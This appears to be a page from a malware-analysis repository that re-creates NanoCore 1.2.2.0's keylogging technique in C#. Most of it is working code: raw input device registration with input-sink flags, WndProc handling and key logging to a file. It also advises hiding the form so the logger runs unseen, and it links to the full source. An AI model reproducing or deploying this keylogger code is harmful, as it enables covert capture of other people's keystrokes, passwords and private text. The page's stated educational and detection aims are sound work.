MalwareAnalysisSeries
This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules
Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham
NanoCore 1.2.2.0: Keylogging
This is a keylogger TTP extracted from NanoCore 1.2.2.0. In this TTP, the malware registers a RAW input device to recieve all RAW inputs from the windows process of WndProc and handles the RAW inputs to the unicode characters for logging and recording everything that is typed in either on virutal or phyiscal keyboard.
- Execute the logger
- Type something
- See the log file created in Public folder
Implementation
Required APIs
NanoCore uses exports from user32.dll, RegisterRawInputDevices to register itself as virtual device and GetRawInputData to receive RAW inputs either from physical or virutal keyboard:
[DllImport("User32.dll")]
public static extern bool RegisterRawInputDevices(RAWINPUTDEVICE[] pRawInputDevice, uint uiNumDevices, uint cbSize);
[DllImport("User32.dll")]
public static extern int GetRawInputData(IntPtr hRawInput, uint uiCommand, IntPtr pData, ref uint pcbSize, uint cbSizeHeader);
Define necessary structures
[StructLayout(LayoutKind.Sequential)]
public struct RAWINPUTHEADER
{
public uint dwType;
public uint dwSize;
public IntPtr hDevice;
public IntPtr wParam;
}
[StructLayout(LayoutKind.Sequential)]
public struct RAWKEYBOARD
{
public ushort MakeCode;
public ushort Flags;
public ushort Reserved;
public ushort VKey;
public uint Message;
public uint ExtraInformation;
}
[StructLayout(LayoutKind.Explicit)]
public struct RAWINPUT
{
[FieldOffset(0)]
public RAWINPUTHEADER header;
[FieldOffset(16)]
public RAWKEYBOARD keyboard;
}
[StructLayout(LayoutKind.Sequential)]
public struct RAWINPUTDEVICE
{
public ushort usUsagePage;
public ushort usUsage;
public uint dwFlags;
public IntPtr hwndTarget;
}
Register RAW Input device
// Register for keyboard input
RAWINPUTDEVICE rid = new RAWINPUTDEVICE();
rid.usUsagePage = 0x01;
rid.usUsage = 0x06;
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = handle;
if (!RegisterRawInputDevices(new[] { rid }, 1, (uint)Marshal.SizeOf(typeof(RAWINPUTDEVICE))))
{
//MessageBox.Show("Failed to register raw input device(s).");
return false;
}
return true;
Receive RAW Inputs
After the devices has been registered, the process will start receiving all inputs using the function WndProc. It is a windows procedure function that is responsible for processing messages sent to the Form Window. In our case, our malware is a hidden form application running in background, which will also receive all inputs using the function WndProc. What we need to do is to simply Handle the RAW inputs and forward the message to other Forms.
// The process that recieves all RAW inputs WndProc overridden to handle the raw inputs and log them
protected override void WndProc(ref Message m)
{
switch (m.Msg)
{
case WM_INPUT:
HandleRawInput(m.LParam);
break;
}
base.WndProc(ref m);
}
Handle RAW Inputs
private void HandleRawInput(IntPtr hRawInput)
{
Console.Write("[x] Getting RAW input data...");
RAWINPUT input = new RAWINPUT();
uint size = (uint)Marshal.SizeOf(typeof(RAWINPUT));
if (GetRawInputData(hRawInput, RID_INPUT, IntPtr.Zero, ref size, (uint)Marshal.SizeOf(typeof(RAWINPUTHEADER))) != -1)
{
IntPtr buffer = Marshal.AllocHGlobal((int)size);
if (GetRawInputData(hRawInput, RID_INPUT, buffer, ref size, (uint)Marshal.SizeOf(typeof(RAWINPUTHEADER))) == size)
{
input = (RAWINPUT)Marshal.PtrToStructure(buffer, typeof(RAWINPUT));
if (input.header.dwType == INPUT_KEYBOARD && (input.keyboard.Flags & 1) == 0) // Only when a key is pressed down
{
LogKey(input.keyboard.VKey); //our custom method to record keys
}
}
Marshal.FreeHGlobal(buffer);
}
}
This program can only work as Form application because to receive RAW inputs from WndProc, we need Windows Forms. There are ways to hide forms, just minimize it and set its visibility to false.
Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries
Disclaimer
Artifacts and code of this repository is intended to be used for educational purposes only!!!